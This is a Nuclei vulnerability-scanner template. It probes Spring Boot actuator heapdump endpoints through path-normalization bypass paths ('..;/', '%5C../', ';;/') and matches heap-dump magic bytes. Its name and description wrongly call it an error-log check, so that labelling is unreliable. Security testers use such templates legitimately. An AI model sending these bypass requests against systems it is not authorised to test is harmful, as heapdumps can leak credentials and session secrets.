id: ngix_projeto_1_actuator2comtact

info:
  name: Error Log Files Detect
  author: Redflare-Cyber_
  severity: medium
  description: Error log files were exposed, enhanced from official nuclei templates with added paths and matchers.
  metadata:
    max-request: 29
    shodan-query: html:"error.log"
  tags: nginx

http:
  - method: GET
    path:
      - "{{BaseURL}}/..;/heapdump"
      - "{{BaseURL}}/..;/actuator/heapdump"
      - "{{BaseURL}}/..;/api/v5/actuator/heapdump"
      - "{{BaseURL}}/..;/api/v4/actuator/heapdump"
      - "{{BaseURL}}/..;/api/v3/actuator/heapdump"
      - "{{BaseURL}}/..;/api/v2/actuator/heapdump"
      - "{{BaseURL}}/..;/api/v1/actuator/heapdump"
      - "{{BaseURL}}/..;/api/actuator/heapdump"
      - "{{BaseURL}}/..;/heapdump"
      - "{{BaseURL}}/%5C../actuator/heapdump"
      - "{{BaseURL}}/%5C../heapdump"
      - "{{BaseURL}}/%5C../actuator/heapdump"
      - "{{BaseURL}}/%5C../api/v5/actuator/heapdump"
      - "{{BaseURL}}/%5C../api/v4/actuator/heapdump"
      - "{{BaseURL}}/%5C../api/v3/actuator/heapdump"
      - "{{BaseURL}}/%5C../api/v2/actuator/heapdump"
      - "{{BaseURL}}/%5C../api/v1/actuator/heapdump"
      - "{{BaseURL}}/%5C../api/actuator/heapdump"
      - "{{BaseURL}}/..;/heapdump"
      - "{{BaseURL}}/;;/actuator/heapdump"
      - "{{BaseURL}}/;;/heapdump"
      - "{{BaseURL}}/;;/actuator/heapdump"
      - "{{BaseURL}}/;;/api/v5/actuator/heapdump"
      - "{{BaseURL}}/;;/api/v4/actuator/heapdump"
      - "{{BaseURL}}/;;/api/v3/actuator/heapdump"
      - "{{BaseURL}}/;;/api/v2/actuator/heapdump"
      - "{{BaseURL}}/;;/api/v1/actuator/heapdump"
      - "{{BaseURL}}/;;/api/actuator/heapdump"

    stop-at-first-match: true
    max-size: 2097152 # 2MB - Max Size to read from server response
    matchers-condition: and
    matchers:

      - type: binary
        part: body
        binary:
          - "4a4156412050524f46494c45" # "JAVA PROFILE"
          - "4850524f46" # "HPROF"
          - "1f8b080000000000" # Gunzip magic byte
        condition: or

      - type: status
        status:
          - 200